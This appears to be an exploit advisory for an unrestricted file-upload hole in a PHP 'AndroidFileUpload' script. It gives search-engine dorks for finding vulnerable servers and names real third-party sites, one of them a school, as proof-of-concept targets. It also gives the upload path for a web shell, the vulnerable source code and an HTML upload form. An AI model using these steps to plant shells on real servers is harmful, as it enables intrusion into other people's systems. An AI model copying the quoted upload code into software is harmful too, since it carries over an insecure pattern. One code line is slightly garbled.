#################################################
# Exploit Title: Android FileUpload Vulnerability
# Exploit Author: Mister klio
# Contact : https://www.facebook.com/izzadiine
# Youtube Tuturial : https://youtu.be/OJ-inNajTMI
# Date: 6:20 PM 11/22/2017
# Category: Webapps
# Language: PHP
# Tested on: windows 7 / FireFox
#################################################
#################################################
# Dork 1 : intext:"Index of /AndroidFileUpload"
# Dork 2 :inurl:/AndroidFileUpload/
#################################
# Poc Vulnerable page : https://www.tutorialsee.com/AndroidFileUpload/fileUpload.php
# Poc Upload : https://www.tutorialsee.com/AndroidFileUpload/index.html
# others : https://yhpscool.yhps.tp.edu.tw/web/AndroidFileUpload//fileUpload.php
#################################################
# Shell upload to : AndroidFileUpload/uploads/yourshell.php
#################################################
# Remote Source Code : fileUpload.php
<?php
echo $_FILES['image']['name'] . '<br/>';
//ini_set('upload_max_filesize', '10M');
//ini_set('post_max_size', '10M');
//ini_set('max_input_time', 300);
//ini_set('max_execution_time', 300);
$target_path = "uploads/";
$target_path = $target_path . basename($_FILES['image']['name']);
try {
//throw exception if can't move the file
if (!move_uploaded_file($_FILES['image']['tmp_name'], $target_path)) {
throw new Exception('Could not move file');
}
echo "The file " . basename($_FILES['image']['name']) .
" has been uploaded";
} catch (Exception $e) {
die('File did not upload: ' . $e! getMessage());
}
?>
#################################################
# Usage :
#################################################
<form enctype="multipart/form-data" action="fileUpload.php" method="POST">
Choose a file to upload: <input name="image" type="file" /><br />
<input type="submit" value="Upload File" />
</form>
#################################################
# Enjoy Discovered by Mister klio
#################################################